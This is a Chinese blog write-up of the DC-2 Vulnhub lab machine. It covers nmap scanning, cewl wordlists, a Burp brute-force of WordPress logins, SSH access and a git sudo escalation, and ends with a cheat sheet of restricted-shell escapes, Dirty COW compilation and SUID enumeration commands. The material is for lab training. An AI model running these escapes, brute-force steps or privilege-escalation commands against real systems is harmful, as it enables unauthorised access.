DC-2 渗透测试

最新推荐文章于 2022-09-15 22:19:09 发布
最新推荐文章于 2022-09-15 22:19:09 发布
阅读量494 收藏 5
点赞数
分类专栏: 渗透测试 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_39086634/article/details/105421557
版权

DC-2渗透测试

0x00实验环境

靶机:DC-2,IP地址:192.168.8.133

测试机:Kali,IP地址:192.168.8.128;

0x01实验流程

信息收集——主机发现、端口扫描

渗透测试

0x02实验步骤

  1. 主机发现

  1. Masscan以及nmap扫描

  1. 修改hosts文件,访问web

 

发现是wordpress的CMS并得到提示需要cewl制作针对性字典

 

  1. bp爆破登录密码

得到:

tom :parturient

jerry : adipiscing

  1. 登录wordpress

TOM:

Jerry:

在jerry账户下发现flag2

  1. 尝试用ssh登录DC-2

ssh tom@dc-2 -p 7744

但是发现shell受到了限制,尝试绕过限制

切换到jerry

  1. jerry用户好像可以用git命令

尝试git提权

 

sudo git help config

!/bin/bash

 

提权成功

 

 

总结:

  1. shell绕过(rbash-受限制的bash)

首先查看当前用户可以使用的命令

echo $PATH  #查看自己可以使用的命令

然后进行绕过尝试

1.

vi test

:!/bin/sh

2.ed

3.ne

4. more less

more test

!'sh'

5.

man ls

操作同more less

6.find

/usr/bin/find /etc/passwd  -exec whoami \;

/usr/bin/find /etc/passwd  -exec /bin/sh \;

7.nmap

低版本

8.awk

awk 'BEGIN {system("/bin/sh")}'

9.python

python -c "import os;os.system('whoami')"

python -c "import os;os.system('/bin/sh')"

python -c "import pty;pty.spawn('/bin/sh')"

10.ruby

11.perl

12.php

13.

BASH_CMDS[a]=/bin/sh;a

 

  1. 提权
  1. 脏牛提权

Gcc  -pthread dirty.c –o exp -lcrypt

  1. Suid提权

条件:

运行某些程序时暂时获得root的权限,例如ping(socket需要root才能运行)

            find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

find / -user root -perm -4000 -print 2>/dev/null

三种都可以

            搜索可以提权的程序,一般有以下 :

nmap vim find Bash More Less Nano cp

  1. Git提权

可以使用git命令时:

sudo git help config

  !/bin/bash或者!'sh'完成提权

 

sudo git  -p help

  !/bin/bash

 

Darklord.W
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2748
DC-2靶机渗透测试思路及流程
linux脚本awk,在awk中运行shell命令
weixin_36247910的博客
04-30 883
目前我所了解的在awk中运行shell命令 有2中方式实现1.awk内置函数system2.通过awk print出要执行的命令 然后交给/bin/bash 执行awk 内置函数system执行方法 awk ‘BEGIN{system(“shell命令)}’ 就行[root@CHSHA-CT-WWW-249 ~]# awk ‘BEGIN{system(“hostname”)}’CHSHA-CT...
DC-2靶场渗透测试实验整理
u013930899的博客
09-15 1850
dc-2实验
靶机渗透-----DC-2
Z_Grant的博客
09-17 2853
文章目录一,工具介绍(1)cewl密码生成器(2)WPScan二,测试流程(1)主机发现(2)根据80端口的进一步测试(3)攻击准备(4)结合扫描出来的服务,尝试SSH登录 一,工具介绍 (1)cewl密码生成器 参考文章 用途 cewl是一个ruby应用,爬行指定url的指定深度。结果会返回一个单词列表,这个列进行密码爆破。 . 原理 爬取网站上的信息,遍历目录。生成一些可能的密码组合。...
渗透测试之Vulnhub-DC2
TenG的博客
04-26 215
Preface 本篇文章记录为vulnhub系列DC2,练习过程中也参考了其他大师傅的文章,加上个人的一些思路见解就有了此文,个人拙见定会有出错,还请各位师傅们指正。参考文章 Process 信息搜集 靶机搭建完成以后发现无法访问正常页面,根据提示应该是无法将地址解析到域名,我们需要在本地hosts文件末尾添加一条解析记录 靶机IP dc-2 hosts是一个没有扩展名的系统文件,可以用记事本等工具打开,其作用就是将网址域名与其对应的IP地址建立一个关联,当用户在浏览器中输入一个需要登录的网址时,系统会首
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
DC-2靶机实战 渗透测试
她叫常玉莹
07-20 607
DC-2主机发现 信息搜集Flag1Flag2Flag3Flag4Final-flag 主机发现 信息搜集 nmap主机发现 我们的靶机地址是:192.168.0.131 nmap扫描 nmap -A -T4 -p- 192.168.0.131 80端口跑着http 7744端口跑着ssh Flag1 访问下80 无法访问这里修改下hosts文件 linux中hosts文件位置 /etc/hosts 这回可以正常访问了,这里有个重定向直接跳转dc-2 在主页中找到找到了flag1 flag1中
【渗透项目】靶机DC-6渗透过程
命运的旋律的博客
05-05 702
信息收集 主机发现 nmap -sn 192.168.189.0/24 端口扫描 nmap -sT -v -A 192.168.72.158 --script=vuln 发现开放了80端口,尝试用浏览器对该站点进行访问 该网站应该做了访问限制,只能通过域名的方式访问,但因为本地hosts中缺少对应的IP,导致域名解析失败而无法进行访问,解决办法是在hosts文件中写入对应域名和IP...
【渗透项目】靶机DC-2渗透过程
命运的旋律的博客
03-17 803
文章目录信息收集IP扫描端口扫描目录暴破浏览网站漏洞利用SSH登陆提权操作工具介绍cewlwpscan 文章主要是对靶机DC-2的一次渗透测试过程记录 信息收集 好的信息收集能大大提高渗透的成功率,因此要养成良好的信息收集习惯 因为靶机与测试主机在同一网段内,首先需要做的就是获取靶机的IP地址 这里就先介绍一下常见的同网段IP地址获取方法 IP扫描 nmap 首先登场的是重量级工具NMAP,功能...
DC-2靶机渗透
qq_56805195的博客
07-09 339
1
SqlMap
热门推荐
zhaji001
12-18 1万+
收集的一些技巧资源来之互联网 -u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log”  恢复:-s “xx.log” –r...
DC-2 靶机渗透
Rex_Surprise的博客
05-10 195
DC-2靶机渗透 1. 渗透过程 !!!THE_ENT!!! 2. 重要信息 DC-2靶机渗透1. 渗透过程 主机发现: nmap -sP 192.168.0.1/24 发现了DC-2的IP地址: 192.168.0.131 下载主机的时候要添加dns到hosts文件 echo “192.168.0.131 dc-2 ” &gt...
SqlMap用户手册
ludx212的专栏
06-10 1253
SqlMap用户手册 转自 投稿者:梧桐雨 发表于:2013-07-28   点击:13,549 引:本文已经出了续篇,文章内容有点长,但都是精华,读者们耐心的看吧,续篇的链接在文末。 1 http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sqlmap这么一个url的时候,
vulnhub渗透测试靶机DC-9
weixin_46128614的博客
01-09 3907
靶机下载地址:https://www.vulnhub.com/entry/dc-9,412/ 首先nmap扫描一下 nmap 192.168.49.26 -sT -sV -p- -T5 -A 直接进入80端口,发现一个search框,可以查询用户信息,与数据库有交互 直接跑sqlmap,果然发现了漏洞 脱裤吧 这里发现了网站后台的admin以及密码 在线MD5解一下 admin: tran...
DC-2(渗透实战演练)
weixin_44537595的博客
10-19 218
信息收集 扫描端口 访问网站发现有跳转,但是显示失败,需要我们进行ip和域名绑定 通过/etc/hosts绑定 浏览网站发现flag 大致意思说,你字典有问题,需要cewl工具生成字典 Cewl http://dc-2 -w /tmp/passwd.dict1 扫描网站目录 可以通过gobuster 、dirb、metasploit扫描 结果 /index.php (Status: 301) /wp-content (Status: 301) /wp-admin (Status: 301) .
nmap扫描DC-5
最新发布
05-21
在扫描DC-5时,可以通过nmap来探测该目标的开放端口和服务,以便进行后续的渗透测试。 以下是使用nmap扫描DC-5的步骤: 1. 打开终端,并输入以下命令来扫描目标IP地址: ``` nmap -sV -O 192.168.80.139 ``` 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值